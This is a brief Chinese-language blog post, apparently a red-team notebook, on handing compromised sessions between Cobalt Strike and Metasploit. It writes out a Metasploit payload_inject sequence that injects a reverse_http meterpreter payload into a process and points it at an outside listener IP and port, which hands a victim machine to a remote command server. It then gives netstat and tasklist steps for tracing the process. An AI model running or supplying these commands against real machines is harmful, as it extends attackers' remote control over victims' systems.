这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

cs移交到msf

QQ截图20211113110732.jpg
QQ截图20211113110819.jpg
QQ截图20211113110806.jpg

msf上run一下就有meterpreter了

msf移交到cs

我这边显示走的是notepad.exe进程
简单说就是将msf的payload构造成cs的某个监听器的样子,然后run就好了,记住这里set payload的协议要设置成和cs一样的,
也最好和最初上线的那个协议是一样的才比较稳妥。
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5566 cs监听器的端口
set lhost 101.37.160.211 cs的ip
set session 1 导入session
exploit
不过回弹的session的延迟挺高的,因为又多走了一层

netstat -ano
QQ截图20211113122055.jpg
找到对应的PID然后tasklist /svc找到和PID对应的exe,打开任务管理器
QQ截图20211113122711.jpg
右键定位exe的位置